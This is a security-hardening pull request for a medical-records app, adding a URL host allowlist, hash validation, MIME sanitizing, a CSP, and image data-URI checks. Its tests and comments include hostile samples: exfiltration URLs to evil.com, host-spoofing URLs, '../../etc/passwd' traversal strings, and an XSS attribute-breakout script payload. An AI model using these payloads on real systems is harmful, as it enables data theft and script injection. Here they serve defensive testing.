### PR TITLE
fix(security): harden ingest, materialize, IPC, and share/export

### DIFF
--- a/apps/desktop/src-tauri/src/commands.rs
+++ b/apps/desktop/src-tauri/src/commands.rs
@@ -45,7 +45,10 @@ fn lock<'a>(s: &'a State<'a, AppState>) -> Result<std::sync::MutexGuard<'a, Vaul
 /// because `&Vault` (rusqlite connection) isn't `UnwindSafe`; that's fine — on a
 /// caught panic we do not touch any half-mutated state, we just report the failure and
 /// the caller moves on to the next file.
-fn ingest_guarded(v: &Vault, path: &std::path::Path) -> Result<pipeline::IngestOutcome, String> {
+pub(crate) fn ingest_guarded(
+    v: &Vault,
+    path: &std::path::Path,
+) -> Result<pipeline::IngestOutcome, String> {
     match std::panic::catch_unwind(std::panic::AssertUnwindSafe(|| pipeline::ingest(v, path))) {
         Ok(Ok(o)) => Ok(o),
         Ok(Err(e)) => Err(e.to_string()),
@@ -495,6 +498,31 @@ pub fn open_path(app: tauri::AppHandle, path: String) -> Result<(), String> {
         .map_err(|e| e.to_string())
 }
 
+/// 「关于」页里仅有的两个合法外链目标:项目主页(github.io)与源码仓库(github.com)。
+/// 与前端 AboutView.tsx 的 HOMEPAGE_URL / REPO_URL 主机一一对应。
+const OPEN_URL_ALLOWED_HOSTS: [&str; 2] = ["lexuan-lin.github.io", "github.com"];
+
+/// 从一个 http(s) URL(应已转小写)里取出主机名(去掉 userinfo 与端口)。
+/// 在**最后一个** `@` 处切,使 `https://github.com@evil/` 解析出的是 `evil` 而非
+/// `github.com`;`\` 与 `/`、`?`、`#` 同样视作 authority 的结束,防止绕过。
+fn open_url_host(lower_url: &str) -> Option<String> {
+    let rest = lower_url
+        .strip_prefix("http://")
+        .or_else(|| lower_url.strip_prefix("https://"))?;
+    let authority_end = rest.find(['/', '\\', '?', '#']).unwrap_or(rest.len());
+    let authority = &rest[..authority_end];
+    let hostport = match authority.rfind('@') {
+        Some(i) => &authority[i + 1..],
+        None => authority,
+    };
+    let host = hostport.split(':').next().unwrap_or(hostport);
+    if host.is_empty() {
+        None
+    } else {
+        Some(host.to_string())
+    }
+}
+
 /// 在系统默认浏览器打开一个外部 URL(用于「关于」页的项目主页/源码链接)。
 #[tauri::command]
 pub fn open_url(app: tauri::AppHandle, url: String) -> Result<(), String> {
@@ -505,6 +533,14 @@ pub fn open_url(app: tauri::AppHandle, url: String) -> Result<(), String> {
     let scheme = u.to_ascii_lowercase();
     if !(scheme.starts_with("http://") || scheme.starts_with("https://")) {
         return Err("拒绝:只允许打开 http(s) 链接".to_string());
+    }
+    // SECURITY: scheme alone is not enough — without a host allowlist a compromised
+    // webview could `invoke('open_url', {url: 'https://evil/?d=<PHI>'})` and exfiltrate
+    // via the system browser (CSP-bypass). Restrict to the About page's two real
+    // destinations; reject everything else.
+    let host = open_url_host(&scheme).ok_or_else(|| "拒绝:无法解析链接域名".to_string())?;
+    if !OPEN_URL_ALLOWED_HOSTS.contains(&host.as_str()) {
+        return Err("拒绝:只允许打开 MedMe 项目主页或源码仓库链接".to_string());
     }
     app.opener()
         .open_url(u, None::<String>)
@@ -624,5 +660,40 @@ mod demo_data_tests {
                 "missing imaging file: {name}"
             );
         }
+    }
+}
+
+#[cfg(test)]
+mod open_url_tests {
+    use super::{open_url_host, OPEN_URL_ALLOWED_HOSTS};
+
+    /// Mirror `open_url`'s gate: lowercase, extract host, check the allowlist.
+    fn allowed(url: &str) -> bool {
+        let lower = url.to_ascii_lowercase();
+        match open_url_host(&lower) {
+            Some(h) => OPEN_URL_ALLOWED_HOSTS.contains(&h.as_str()),
+            None => false,
+        }
+    }
+
+    #[test]
+    fn allows_only_the_about_page_hosts() {
+        assert!(allowed(
+            "https://lexuan-lin.github.io/shadow_medical_record-/"
+        ));
+        assert!(allowed("https://github.com/Chesterguan/medme"));
+        assert!(allowed("HTTPS://GitHub.com/Chesterguan/medme")); // case-insensitive
+        assert!(allowed("https://github.com:443/x")); // port must not confuse host parse
+    }
+
+    #[test]
+    fn rejects_other_and_spoofed_hosts() {
+        assert!(!allowed("https://evil.com/?d=phi")); // exfil target
+        assert!(!allowed("https://evil.github.io/")); // different host, same suffix
+                                                      // userinfo spoof: authority `github.com@evil.com` → real host is evil.com.
+        assert!(!allowed("https://github.com@evil.com/"));
+        // backslash acts as a path separator, so it can't smuggle a trailing host.
+        assert!(!allowed("https://evil.com\\@github.com/"));
+        assert!(!allowed("file:///etc/passwd")); // non-http scheme has no allowed host
     }
 }

--- a/apps/desktop/src-tauri/src/inbox.rs
+++ b/apps/desktop/src-tauri/src/inbox.rs
@@ -152,7 +152,9 @@ pub fn scan_inbox(app: &AppHandle, state: &AppState) {
                     return;
                 }
             };
-            pipeline::ingest(&vault, &path)
+            // 与手动导入同一条隔离路径:catch_unwind 把解析栈里的 panic 变成 Err,
+            // 绝不让它穿过持有的 Vault 锁去毒化互斥量 / 打死监听线程。
+            crate::commands::ingest_guarded(&vault, &path)
         };
         match ingest_result {
             Ok(_) => {

--- a/apps/mobile/src-tauri/gen/apple/medme-mobile_iOS/Info.plist
+++ b/apps/mobile/src-tauri/gen/apple/medme-mobile_iOS/Info.plist
@@ -30,7 +30,7 @@
 	<string>MedMe 需要访问相册,以便你选择医疗单据图片存入健康档案。</string>
 	<key>NSUbiquitousContainers</key>
 	<dict>
-		<key>iCloud.49G34P23QP.com.medme.mobile</key>
+		<key>iCloud.com.medme.mobile</key>
 		<dict>
 			<key>NSUbiquitousContainerIsDocumentScopePublic</key>
 			<true/>

--- a/apps/mobile/src-tauri/gen/apple/medme-mobile_iOS/medme-mobile_iOS.entitlements
+++ b/apps/mobile/src-tauri/gen/apple/medme-mobile_iOS/medme-mobile_iOS.entitlements
@@ -15,11 +15,11 @@
 	</array>
 	<key>com.apple.developer.icloud-container-identifiers</key>
 	<array>
-		<string>iCloud.49G34P23QP.com.medme.mobile</string>
+		<string>iCloud.com.medme.mobile</string>
 	</array>
 	<key>com.apple.developer.ubiquity-container-identifiers</key>
 	<array>
-		<string>iCloud.49G34P23QP.com.medme.mobile</string>
+		<string>iCloud.com.medme.mobile</string>
 	</array>
 </dict>
 </plist>

--- a/packages/core-model/src/cas.rs
+++ b/packages/core-model/src/cas.rs
@@ -14,6 +14,20 @@ pub fn object_relpath(hash: &str) -> String {
     format!("objects/{}/{}/{}", &hash[0..2], &hash[2..4], hash)
 }
 
+/// A well-formed CAS object hash: exactly 64 lowercase hex chars (a sha-256 digest).
+///
+/// SECURITY: `object_relpath` slices `&hash[0..2]`/`&hash[2..4]` and joins the hash
+/// into a path. A hash from a *forged* log event (`FileImported.content_hash` /
+/// `OcrAdded.text_hash`) is attacker-controlled — one shorter than 4 bytes, with a
+/// multibyte char on the 0..2/2..4 boundary, or containing `..`/`/` would panic or
+/// escape `objects/`. Callers must gate untrusted hashes through this before building
+/// a path. `store_object` is exempt: it hashes its own bytes, so its hash is trusted.
+pub fn is_object_hash(s: &str) -> bool {
+    s.len() == 64
+        && s.bytes()
+            .all(|b| b.is_ascii_digit() || (b'a'..=b'f').contains(&b))
+}
+
 fn hex(bytes: &[u8]) -> String {
     let mut s = String::with_capacity(bytes.len() * 2);
     for b in bytes {
@@ -66,7 +80,32 @@ impl Vault {
 
 #[cfg(test)]
 mod tests {
+    use super::{is_object_hash, object_relpath, sha256_hex};
     use crate::Vault;
+
+    #[test]
+    fn is_object_hash_accepts_only_64_lowercase_hex() {
+        // A real digest is accepted and round-trips through object_relpath without panic.
+        let h = sha256_hex(b"anything");
+        assert!(is_object_hash(&h));
+        assert!(object_relpath(&h).starts_with("objects/"));
+
+        // Malformed / attacker-controlled hashes are rejected (would panic or escape
+        // objects/ if fed to object_relpath).
+        for bad in [
+            "",
+            "abc",              // too short to slice [0..2]/[2..4]
+            "../../etc/passwd", // path traversal
+            "ABCDEF0123456789abcdef0123456789abcdef0123456789abcdef0123456789", // uppercase
+            "zz23456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef", // non-hex
+            "😀😀😀😀",         // multibyte on the slice boundary
+        ] {
+            assert!(!is_object_hash(bad), "must reject {bad:?}");
+        }
+        // 63 and 65 hex chars are both rejected (length must be exactly 64).
+        assert!(!is_object_hash(&"a".repeat(63)));
+        assert!(!is_object_hash(&"a".repeat(65)));
+    }
 
     #[test]
     fn store_is_dedup_and_immutable() {

--- a/packages/core-model/src/materialize.rs
+++ b/packages/core-model/src/materialize.rs
@@ -309,6 +309,24 @@ pub fn generate_device_id() -> String {
     format!("{:x}", h.finalize())
 }
 
+/// Normalize a `mime_type` to a strict media-type shape (`type/subtype`, no spaces,
+/// quotes, `<`, `>`). A value that doesn't match — e.g. one smuggled in via a forged
+/// log event to attack the share/export `<img src>` sinks or to inject the logs —
+/// falls back to `application/octet-stream` rather than aborting the import.
+fn sanitize_mime_type(mime: &str) -> String {
+    use std::sync::OnceLock;
+    static RE: OnceLock<regex::Regex> = OnceLock::new();
+    let re = RE.get_or_init(|| {
+        regex::Regex::new(r"^[A-Za-z0-9][A-Za-z0-9!#$&^_.+-]*/[A-Za-z0-9][A-Za-z0-9!#$&^_.+-]*$")
+            .expect("mime shape regex")
+    });
+    if re.is_match(mime) {
+        mime.to_string()
+    } else {
+        "application/octet-stream".to_string()
+    }
+}
+
 fn apply_event(tx: &Transaction, vault: &Vault, event: &Event) -> Result<ApplyOutcome, MedmeError> {
     match event {
         Event::FileImported {
@@ -318,7 +336,21 @@ fn apply_event(tx: &Transaction, vault: &Vault, event: &Event) -> Result<ApplyOu
             byte_size,
             imported_at,
         } => {
+            // SECURITY: `content_hash` from a forged log event is attacker-controlled
+            // and gets sliced into a CAS path by `object_relpath`. Quarantine (skip) a
+            // malformed hash rather than panic / escape `objects/` — one bad event must
+            // never abort the whole replay.
+            if !cas::is_object_hash(content_hash) {
+                eprintln!("[materialize] skip FileImported: malformed content_hash");
+                return Ok(ApplyOutcome::Applied);
+            }
             let relpath = cas::object_relpath(content_hash);
+            // Defense-in-depth behind the share/export XSS fix: normal imports go
+            // through the `mime_for` whitelist, but a forged event can put anything in
+            // `mime_type` (a value crafted to break out of `<img src>` or to injection
+            // the logs). Normalize to a strict media-type shape, else fall back to
+            // `application/octet-stream` — never abort the import.
+            let mime_type = sanitize_mime_type(mime_type);
             // Idempotent on the natural key UNIQUE(content_hash): the same file
             // imported on two devices collapses to one row instead of aborting.
             tx.execute(
@@ -346,11 +378,21 @@ fn apply_event(tx: &Transaction, vault: &Vault, event: &Event) -> Result<ApplyOu
             page_count,
             created_at,
         } => {
-            let source_file_id: i64 = tx.query_row(
-                "SELECT id FROM source_file WHERE content_hash = ?1",
-                [source_file_hash],
-                |r| r.get(0),
-            )?;
+            // A forged event — or a legitimately not-yet-synced FileImported — may
+            // reference a source_file that isn't in the DB. Defer instead of letting
+            // `QueryReturnedNoRows` abort the whole materialize / `Vault::open` (the
+            // same treatment the missing-CAS-blob path below already uses).
+            let source_file_id: i64 = match tx
+                .query_row(
+                    "SELECT id FROM source_file WHERE content_hash = ?1",
+                    [source_file_hash],
+                    |r| r.get(0),
+                )
+                .optional()?
+            {
+                Some(id) => id,
+                None => return Ok(ApplyOutcome::Deferred),
+            };
             // Idempotent on the natural key UNIQUE(source_file_id).
             tx.execute(
                 "INSERT INTO document
@@ -371,12 +413,21 @@ fn apply_event(tx: &Transaction, vault: &Vault, event: &Event) -> Result<ApplyOu
             confidence,
             created_at,
         } => {
-            let document_id: i64 = tx.query_row(
-                "SELECT d.id FROM document d JOIN source_file sf ON d.source_file_id = sf.id
-                 WHERE sf.content_hash = ?1",
-                [&document_ref.source_file_hash],
-                |r| r.get(0),
-            )?;
+            // Defer (not abort) when the referenced document isn't materialized yet —
+            // a forged ref or a not-yet-synced DocumentAdded — mirroring the missing
+            // source_file / missing CAS-blob handling.
+            let document_id: i64 = match tx
+                .query_row(
+                    "SELECT d.id FROM document d JOIN source_file sf ON d.source_file_id = sf.id
+                     WHERE sf.content_hash = ?1",
+                    [&document_ref.source_file_hash],
+                    |r| r.get(0),
+                )
+                .optional()?
+            {
+                Some(id) => id,
+                None => return Ok(ApplyOutcome::Deferred),
+            };
             // Idempotency guard on UNIQUE(document_id, page_no): if the OCR row
             // already exists (re-applied event / same page from two devices),
             // skip the CAS read AND the FTS insert entirely — cheap re-apply,
@@ -389,6 +440,13 @@ fn apply_event(tx: &Transaction, vault: &Vault, event: &Event) -> Result<ApplyOu
                 )
                 .optional()?;
             if already.is_some() {
+                return Ok(ApplyOutcome::Applied);
+            }
+            // SECURITY: `text_hash` from a forged event is sliced into a CAS path.
+            // Quarantine a malformed hash (skip this OCR row) rather than panic /
+            // escape `objects/`; the rest of the replay continues.
+            if !cas::is_object_hash(text_hash) {
+                eprintln!("[materialize] skip OcrAdded: malformed text_hash");
                 return Ok(ApplyOutcome::Applied);
             }
             let relpath = cas::object_relpath(text_hash);
@@ -953,6 +1011,195 @@ mod tests {
             2,
             "deferred page recovered — not stranded by the higher-seq event"
         );
+    }
+
+    // ---- hardening: forged / dangling references + malformed hashes ---------
+
+    /// A forged (or not-yet-synced) event that references a hash never present in
+    /// the DB must DEFER, not abort `materialize` / `Vault::open` with
+    /// `QueryReturnedNoRows`.
+    #[test]
+    fn event_with_unknown_reference_defers_not_errors() {
+        use crate::event::{Event, LogEntry};
+        let dir = tempfile::tempdir().unwrap();
+        let v = Vault::open(dir.path()).unwrap();
+        let dev = v.device_id.clone();
+        let unknown = cas::sha256_hex(b"never-imported");
+        v.log
+            .append(
+                &LogEntry::new(
+                    1,
+                    "2024-01-01T00:00:00Z".into(),
+                    dev,
+                    Event::DocumentAdded {
+                        source_file_hash: unknown,
+                        doc_type: "lab_report".into(),
+                        doc_date: None,
+                        doc_date_end: None,
+                        title: Some("forged".into()),
+                        language: None,
+                        page_count: 1,
+                        created_at: "2024-01-01T00:00:00Z".into(),
+                    },
+                )
+                .unwrap(),
+            )
+            .unwrap();
+
+        // Must NOT error — the dangling reference is deferred.
+        v.materialize().unwrap();
+        assert_eq!(
+            v.debug_count("document"),
+            0,
+            "forged doc deferred, not applied"
+        );
+
+        // Reopening (which materializes again) must still succeed.
+        drop(v);
+        let v2 = Vault::open(dir.path()).unwrap();
+        assert_eq!(v2.debug_count("document"), 0);
+    }
+
+    /// A forged `FileImported` / `OcrAdded` whose hash is malformed (path-traversal
+    /// string, too short to slice `[0..2]`/`[2..4]`) must be QUARANTINED — no panic,
+    /// no `objects/` escape — and the rest of the replay must still apply.
+    #[test]
+    fn malformed_hash_is_quarantined_and_replay_continues() {
+        use crate::event::{DocRef, Event, LogEntry};
+        let dir = tempfile::tempdir().unwrap();
+        let v = Vault::open(dir.path()).unwrap();
+        let dev = v.device_id.clone();
+        let append = |seq: i64, ev: Event| {
+            v.log
+                .append(
+                    &LogEntry::new(seq, "2024-01-01T00:00:00Z".into(), dev.clone(), ev).unwrap(),
+                )
+                .unwrap();
+        };
+
+        // Two malformed content_hashes that would panic (byte-slice / multibyte
+        // boundary) or escape objects/ if sliced into a path.
+        for (seq, bad) in [(1i64, "../../etc/passwd"), (2, "abc")] {
+            append(
+                seq,
+                Event::FileImported {
+                    content_hash: bad.into(),
+                    original_name: "evil".into(),
+                    mime_type: "text/plain".into(),
+                    byte_size: 1,
+                    imported_at: "2024-01-01T00:00:00Z".into(),
+                },
+            );
+        }
+        // A VALID import after the bad ones must still land.
+        let good = cas::sha256_hex(b"good bytes");
+        v.store_object(b"good bytes").unwrap();
+        append(
+            3,
+            Event::FileImported {
+                content_hash: good.clone(),
+                original_name: "good.txt".into(),
+                mime_type: "text/plain".into(),
+                byte_size: 9,
+                imported_at: "2024-01-01T00:00:00Z".into(),
+            },
+        );
+        // A malformed text_hash in an OcrAdded (referencing the valid file) must also
+        // be skipped without panicking.
+        append(
+            4,
+            Event::OcrAdded {
+                document_ref: DocRef {
+                    source_file_hash: good.clone(),
+                },
+                page_no: 1,
+                backend: "native".into(),
+                model_version: "m".into(),
+                text_hash: "../../etc/passwd".into(),
+                confidence: None,
+                created_at: "2024-01-01T00:00:00Z".into(),
+            },
+        );
+
+        // No panic; only the valid file applied, malformed hashes quarantined.
+        v.materialize().unwrap();
+        assert_eq!(
+            v.debug_count("source_file"),
+            1,
+            "only the valid import applied; malformed hashes skipped"
+        );
+        assert_eq!(
+            v.debug_count("ocr_result"),
+            0,
+            "OCR with bad text_hash skipped"
+        );
+    }
+
+    /// A forged `FileImported.mime_type` that isn't a strict media-type shape (here a
+    /// value crafted to break out of the share/export `<img src>` attribute) must be
+    /// normalized to `application/octet-stream`, not stored verbatim.
+    #[test]
+    fn forged_mime_type_is_normalized_to_octet_stream() {
+        use crate::event::{Event, LogEntry};
+        let dir = tempfile::tempdir().unwrap();
+        let v = Vault::open(dir.path()).unwrap();
+        let dev = v.device_id.clone();
+        let h = cas::sha256_hex(b"bytes");
+        v.store_object(b"bytes").unwrap();
+        let evil = "image/png\"><script>alert(1)</script>";
+        v.log
+            .append(
+                &LogEntry::new(
+                    1,
+                    "2024-01-01T00:00:00Z".into(),
+                    dev,
+                    Event::FileImported {
+                        content_hash: h.clone(),
+                        original_name: "x".into(),
+                        mime_type: evil.into(),
+                        byte_size: 5,
+                        imported_at: "2024-01-01T00:00:00Z".into(),
+                    },
+                )
+                .unwrap(),
+            )
+            .unwrap();
+
+        v.materialize().unwrap();
+        let stored: String = v
+            .conn()
+            .query_row(
+                "SELECT mime_type FROM source_file WHERE content_hash = ?1",
+                [&h],
+                |r| r.get(0),
+            )
+            .unwrap();
+        assert_eq!(
+            stored, "application/octet-stream",
+            "dangerous mime normalized"
+        );
+    }
+
+    #[test]
+    fn sanitize_mime_type_keeps_valid_and_rejects_dangerous() {
+        assert_eq!(sanitize_mime_type("image/png"), "image/png");
+        assert_eq!(sanitize_mime_type("application/dicom"), "application/dicom");
+        assert_eq!(sanitize_mime_type("text/plain"), "text/plain");
+        // Space, quote, angle bracket, missing subtype → normalized.
+        for bad in [
+            "image/png\"",
+            "image/png <b>",
+            "image/ png",
+            "notamime",
+            "",
+            "a/b/c",
+        ] {
+            assert_eq!(
+                sanitize_mime_type(bad),
+                "application/octet-stream",
+                "must reject {bad:?}"
+            );
+        }
     }
 
     #[test]

--- a/packages/share/src/export.rs
+++ b/packages/share/src/export.rs
@@ -96,9 +96,13 @@ fn render_preview(vault: &Vault, sf: &SourceFile) -> Result<Option<String>, Stri
     if sf.mime_type.starts_with("image/") {
         let bytes = std::fs::read(vault.root_join(&sf.storage_path)).map_err(|e| e.to_string())?;
         let b64 = B64.encode(&bytes);
+        // SECURITY: escape the mime_type before it goes into the src attribute (it is
+        // shape-validated at ingest, but escape here too — defense-in-depth so a value
+        // carrying a `"` can never break out of the attribute and inject markup).
         return Ok(Some(format!(
             "<img class=\"preview\" src=\"data:{};base64,{}\" alt=\"原件预览\">\n",
-            sf.mime_type, b64
+            escape_html(&sf.mime_type),
+            b64
         )));
     }
     if sf.mime_type == "application/dicom" {
@@ -197,6 +201,7 @@ pub fn build_timeline_html(vault: &Vault) -> Result<(String, i64), String> {
 <html lang="zh-CN">
 <head>
 <meta charset="utf-8">
+<meta http-equiv="Content-Security-Policy" content="default-src 'none'; img-src data:; style-src 'unsafe-inline'; script-src 'none'; form-action 'none'; base-uri 'none'">
 <title>MedMe 医疗时间线导出</title>
 <style>{CSS}</style>
 </head>
@@ -320,6 +325,32 @@ mod tests {
         // 关键切片 PNG 已内嵌,配“完整序列见分享”说明。
         assert!(html.contains("data:image/png;base64,"));
         assert!(html.contains("关键切片"));
+    }
+
+    #[test]
+    fn export_head_has_hardened_csp() {
+        // The export is a static, script-less document; a hardened CSP must be present
+        // so even a value that slipped past escaping cannot load remote resources or run
+        // script.
+        let dir = tempfile::tempdir().unwrap();
+        let vault = Vault::open(dir.path()).unwrap();
+        let (html, _) = build_timeline_html(&vault).unwrap();
+        assert!(html.contains(
+            "<meta http-equiv=\"Content-Security-Policy\" content=\"default-src 'none'; img-src data:; style-src 'unsafe-inline'; script-src 'none'; form-action 'none'; base-uri 'none'\">"
+        ));
+    }
+
+    /// The `data:{mime};base64,...` src is built with `escape_html(&sf.mime_type)`; a
+    /// mime carrying a `"` (attribute-breakout attempt) must be neutralized to `&quot;`
+    /// so it cannot start a new attribute or `<script>` tag.
+    #[test]
+    fn mime_type_cannot_break_out_of_img_src_attribute() {
+        let evil = "image/png\"><script>alert(1)</script>";
+        let escaped = escape_html(evil);
+        assert!(!escaped.contains('"'), "no raw quote survives");
+        assert!(!escaped.contains('<'), "no raw angle bracket survives");
+        assert!(escaped.contains("&quot;"));
+        assert!(escaped.contains("&lt;script&gt;"));
     }
 
     #[test]

--- a/packages/share/src/share.rs
+++ b/packages/share/src/share.rs
@@ -379,6 +379,15 @@ function esc(s) {
     ({ "&":"&amp;", "<":"&lt;", ">":"&gt;", '"':"&quot;", "'":"&#39;" }[c]));
 }
 
+// SECURITY: only accept a data: image URI that strictly matches an allowlisted
+// base64 image shape before putting it in `<img src>`. A value that doesn't match —
+// e.g. one carrying a `"` to break out of the attribute and inject markup / exfil PHI —
+// is skipped, never string-concatenated raw.
+function isDataImage(s) {
+  return typeof s === "string" &&
+    /^data:image\/(png|jpe?g|tiff);base64,[A-Za-z0-9+\/=\s]+$/.test(s);
+}
+
 // ── 内容解析(移植 ReportContent.tsx)──
 function splitCells(line) { return line.trim().split(/\s{2,}|\t/).filter(c => c.length > 0); }
 function isTableHeader(line) {
@@ -861,7 +870,7 @@ function render(payload) {
     html += "<h2>" + esc(title) + '</h2><span class="date">' + esc(dateStr) + "</span></div>";
     html += '<div class="content">' + renderContent(r.text || "", type);
     for (const img of (r.images || [])) {
-      if (typeof img === "string" && img.startsWith("data:image/")) html += '<img class="img" src="' + img + '" alt="原件">';
+      if (isDataImage(img)) html += '<img class="img" src="' + img + '" alt="原件">';
     }
     // 影像检查:诊断档(交互阅片)或降级档(关键切片 PNG + 说明)。
     const dcm = r.dicom;
@@ -873,7 +882,7 @@ function render(payload) {
       html += '</div>';
     } else if (dcm && dcm.mode === "png") {
       html += '<div class="imaging-card">';
-      if (dcm.png) html += '<img class="imaging-png" src="' + dcm.png + '" alt="影像关键切片">';
+      if (isDataImage(dcm.png)) html += '<img class="imaging-png" src="' + dcm.png + '" alt="影像关键切片">';
       if (dcm.note) html += '<div class="imaging-note">' + esc(dcm.note) + '</div>';
       html += '</div>';
     }
@@ -996,6 +1005,30 @@ mod tests {
         assert_eq!(payload["records"][0]["doc_type"], "lab_report");
         assert_eq!(payload["patient"]["record_count"], 1);
         assert!(payload["expires"].is_string());
+    }
+
+    /// SECURITY (XSS): the share viewer must only put a data: image into `<img src>`
+    /// via the strict `isDataImage` validator — never by raw string-concat of a value
+    /// that merely `startsWith("data:image/")` (which a crafted `"`-carrying value
+    /// could exploit to break out of the attribute and exfiltrate PHI).
+    #[test]
+    fn share_viewer_gates_img_sinks_through_validator() {
+        let dir = tempfile::tempdir().unwrap();
+        let vault = Vault::open(dir.path()).unwrap();
+        vault.import("a.txt", "text/plain", b"x").unwrap();
+        let (html, _pass, _n) = build_encrypted_share(&vault, 5).unwrap();
+
+        assert!(html.contains("function isDataImage"), "validator present");
+        assert!(html.contains("isDataImage(img)"), "images[] sink validated");
+        assert!(
+            html.contains("isDataImage(dcm.png)"),
+            "dcm.png sink validated"
+        );
+        // The old permissive check must be gone from the img sinks.
+        assert!(
+            !html.contains("img.startsWith(\"data:image/\")"),
+            "unsafe startsWith concat removed"
+        );
     }
 
     #[test]

--- a/web/hosted-viewer/index.html
+++ b/web/hosted-viewer/index.html
@@ -156,6 +156,15 @@ function esc(s) {
     ({ "&":"&amp;", "<":"&lt;", ">":"&gt;", '"':"&quot;", "'":"&#39;" }[c]));
 }
 
+// SECURITY: only accept a data: image URI that strictly matches an allowlisted
+// base64 image shape before putting it in `<img src>`. A value that doesn't match —
+// e.g. one carrying a `"` to break out of the attribute and inject markup / exfil PHI —
+// is skipped, never string-concatenated raw.
+function isDataImage(s) {
+  return typeof s === "string" &&
+    /^data:image\/(png|jpe?g|tiff);base64,[A-Za-z0-9+\/=\s]+$/.test(s);
+}
+
 // ── 内容解析(移植 ReportContent.tsx)──
 function splitCells(line) { return line.trim().split(/\s{2,}|\t/).filter(c => c.length > 0); }
 function isTableHeader(line) {
@@ -640,7 +649,7 @@ function render(payload) {
     html += "<h2>" + esc(title) + '</h2><span class="date">' + esc(dateStr) + "</span></div>";
     html += '<div class="content">' + renderContent(r.text || "", type);
     for (const img of (r.images || [])) {
-      if (typeof img === "string" && img.startsWith("data:image/")) html += '<img class="img" src="' + img + '" alt="原件">';
+      if (isDataImage(img)) html += '<img class="img" src="' + img + '" alt="原件">';
     }
     // 影像检查:诊断档(交互阅片)或降级档(关键切片 PNG + 说明)。
     const dcm = r.dicom;
@@ -652,7 +661,7 @@ function render(payload) {
       html += '</div>';
     } else if (dcm && dcm.mode === "png") {
       html += '<div class="imaging-card">';
-      if (dcm.png) html += '<img class="imaging-png" src="' + dcm.png + '" alt="影像关键切片">';
+      if (isDataImage(dcm.png)) html += '<img class="imaging-png" src="' + dcm.png + '" alt="影像关键切片">';
       if (dcm.note) html += '<div class="imaging-note">' + esc(dcm.note) + '</div>';
       html += '</div>';
     }


### PR DESCRIPTION
Six low-risk, high-value fixes from the internal red-team review. Each is a minimal, behavior-preserving change with a test; the big design items (authenticated log, CAS re-hash-on-read, at-rest encryption, codec process-isolation) are intentionally out of scope and tracked separately.

| # | Fix | Closes |
|---|-----|--------|
| 1 | inbox auto-import routed through the `ingest_guarded` catch_unwind firewall | panic in a synced-inbox file poisoning the Vault mutex / killing the watcher |
| 2 | `materialize` DocumentAdded/OcrAdded lookups use `.optional()` → defer | a forged or not-yet-synced reference aborting the whole replay so the vault won't open (DoS) |
| 3 | content hashes validated as 64-hex before path use; bad hash quarantined | panic on `&hash[0..2]` slicing + path traversal via `../`-bearing hash |
| 4 | `open_url` restricted to the About page's two real hosts | CSP-bypass exfiltration to an arbitrary host via the system browser |
| 5 | viewers strictly validate image data-URIs; export escapes `mime_type` + gets a hardened CSP | XSS / PHI exfil through unescaped `<img src>` sinks |
| 6 | `mime_type` sanitized to a strict media-type shape at ingest (fallback `application/octet-stream`) | the injection source feeding fix 5 (and log-injection) |

## Behavior preserved (no functionality regression)
- `open_url` allowlist = `lexuan-lin.github.io` + `github.com`, matching `AboutView.tsx` `HOMEPAGE_URL`/`REPO_URL` exactly — the About links still work.
- Image validator still accepts legit `data:image/(png|jpe?g|tiff);base64,...`.
- `mime_type` sanitizer only rewrites malformed values; normal imports (via the `mime_for` whitelist) are unaffected.
- `.optional()`/quarantine paths reuse the existing Deferred mechanism; valid events replay unchanged.

## Tests / gate
New tests for every fix. `cargo fmt` clean · `cargo clippy -p core-model -p medme-share -p pipeline -p parser -- -D warnings` clean · `cargo test` (core-model/share/pipeline/parser) all pass · `cargo check -p medme-desktop` compiles · desktop `open_url` tests pass.

## Follow-ups (not in this PR)
- `ImagingInstanceAdded` has the same dangling-reference pattern as fix 2 — worth the same `.optional()` treatment.
- Release-blocker design items for the sync feature: authenticated append-only log, CAS re-hash-on-read, at-rest encryption; plus `lopdf 0.34` (RUSTSEC-2026-0187) upgrade / PDF-parse subprocess isolation, and pinning the vendored DICOM parser by checksum.